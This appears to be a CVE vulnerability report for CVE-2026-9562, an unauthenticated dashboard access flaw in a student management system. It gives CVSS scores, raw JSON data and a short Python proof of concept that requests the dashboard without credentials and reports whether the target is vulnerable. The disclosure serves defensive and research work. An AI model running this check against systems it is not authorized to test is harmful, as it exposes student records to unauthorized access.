Security Vulnerability Report
CVE-2026-9562 CVSS 7.3 HIGH

Published: 2026-05-26 17:16:57
Last Modified: 2026-05-26 19:37:00

Description

A vulnerability has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM up to 56ba287f2e9031523ccb4244cb6e3fe530e4e5d5. The affected element is an unknown function of the component Dashboard. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

sambitraj STUDENT-MANAGEMENT-SYSTEM (commit 56ba287f2e9031523ccb4244cb6e3fe530e4e5d5 and earlier)
Rolling release versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# PoC for CVE-2026-9562: Improper Access Control in STUDENT-MANAGEMENT-SYSTEM
# This script attempts to access the Dashboard without authentication.


def check_vulnerability(target_url):
    """Check if the target is vulnerable to CVE-2026-9562."""
    # Attempt to access the dashboard endpoint directly
    # Adjust the endpoint path based on actual application routing
    dashboard_url = f"{target_url}/dashboard"
    try:
        response = requests.get(dashboard_url, timeout=10)
        # Check if request is successful (200 OK) and contains dashboard content
        if response.status_code == 200 and (
            "student" in response.text.lower()
            or "dashboard" in response.text.lower()
        ):
            print(f"[+] Target {target_url} appears to be VULNERABLE!")
            print("[+] Dashboard accessed without authentication.")
            return True
        else:
            print(f"[-] Target {target_url} does not appear to be vulnerable or endpoint is different.")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_url>")
        print("Example: python poc.py http://localhost:3000")
        sys.exit(1)
    url = sys.argv[1]
    check_vulnerability(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9562", "sourceIdentifier": "[email protected]", "published": "2026-05-26T17:16:57.413", "lastModified": "2026-05-26T19:37:00.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM up to 56ba287f2e9031523ccb4244cb6e3fe530e4e5d5. The affected element is an unknown function of the component Dashboard. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": 
"NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/sambitraj/STUDENT-MANAGEMENT-SYSTEM/", "source": "[email protected]"}, {"url": "https://github.com/sambitraj/STUDENT-MANAGEMENT-SYSTEM/issues/1", "source": "[email protected]"}, {"url": "https://github.com/sambitraj/STUDENT-MANAGEMENT-SYSTEM/issues/1#issue-4348905508", "source": "[email protected]"}, 
{"url": "https://vuldb.com/submit/815536", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365625", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365625/cti", "source": "[email protected]"}]}}